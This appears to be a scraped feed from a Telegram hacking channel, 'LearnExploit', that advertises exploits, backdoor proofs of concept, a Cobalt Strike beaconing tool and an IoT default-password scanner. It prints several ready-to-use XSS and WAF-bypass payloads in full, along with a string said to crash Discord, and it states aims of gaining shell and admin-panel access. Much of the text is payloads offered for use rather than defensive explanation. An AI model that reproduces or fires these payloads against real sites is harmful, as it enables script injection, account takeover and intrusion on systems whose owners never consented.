0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
💻 drozer 💻

💬
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Android Runtime, other apps' IPC endpoints and the underlying OS.

Software pre-requisites:
⚪️ Python3.8
⚪️ Protobuf 4.25.2 or greater
⚪️ Pyopenssl 22.0.0 or greater
⚪️ Twisted 18.9.0 or greater
⚪️ Distro 1.8.0 or greater
⚪️ Java Development Kit 11 or greater

🔼 Install:

👩‍💻 Debian:
cd drozer
python setup.py bdist_wheel
pip install dist/drozer-<version>-py3-none-any.whl


👩‍💻 Arch:
cd drozer
virtualenv -p /usr/bin/python3 venv
source venv/bin/activate
python setup.py bdist_wheel
sudo pip install dist/drozer-<version>-py3-none-any.whl


💻 Usage:
adb install drozer-agent.apk


😸 Github

#Android #Security #Pentest

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥43👍21
Learn the basics of burpsuite. Start using Burp with web applications.

⬇️ Download

#Burpsuite #Kalilinux #Cybersecurity

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥432👍1
TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass

LearnBox:
1_Exploits
2_Video

#CVE #Bug #Authentication #Bypass

📣 T.me/LearnExploit
📣 T.me/BugCod3
👍8🔥6👎3
ری اکشن خوب بگیره اکسپلویتشو گسترش میدم :00
👍12👎6🫡21🆒1
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥321❤‍🔥1
Ty for 900 member

یه هوله ۱۰۰ تاییمون نشه ؟ 😅
CVE-2024-26630

Linux 6.5 Kernel Pointer Leak ❗️

Link

#Cve #linux #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥21
15k beshim ye chi bad sammi darim guys 🤫🔥
When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
🔥16🤬2❤‍🔥11
0Day.Today | Learn Exploit | Zero World | Dark web |
15k beshim ye chi bad sammi darim guys 🤫🔥 When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
نتیجه ی تستش حالا یه چند تا تستی وبسایت ادد زدم .
The result of the test. Now I have done a few tests on the website
🔥121👨‍💻1🫡1
this string crashes discord 🤕

http://./\<#0>:  ://./<#0>

#trick #discord
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍411🆒1
XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2👍1
💣 Genzai 💣

💬
Genzai helps you identify IoT or Internet of Things related dashboards across a single or set of targets provided as an input and furthermore scan them for default password issues and potential vulnerabilities based on paths and versions.

📊 Features:
⚪️ Wireless Router
⚪️ Surveillance Camera
⚪️ HMI or Human Machine Interface
⚪️ Smart Power Control
⚪️ Building Access Control System
⚪️ Climate Control
⚪️ Industrial Automation
⚪️ Home Automation
⚪️ Water Treatment System

😸 Github

⬇️ Download
🔒 LearnExploit

#GO #iot #Security #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
53🔥3👍1
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👍2❤‍🔥1
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5👍31
قیمت Ton هم شده 7 دلار 🔥

قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار
😵💎

پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️

——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍2
پاول دورف اعلام کرده که تعداد کاربران فعال تلگرام از مرز ۹۰۰ میلیون کاربر در ماه عبور کرده و این اپ ۶‌امین اپ پراستفاده و پردانلود در جهان هست.

درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥

Github

#poc #backdoor #0day
——————‌
0Day.Today
@LearnExploit
@Tech_Army
GraphStrike: Cobalt Strike HTTPS beaconing over Microsoft Graph API

Link

#cobalt_strike #tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👍1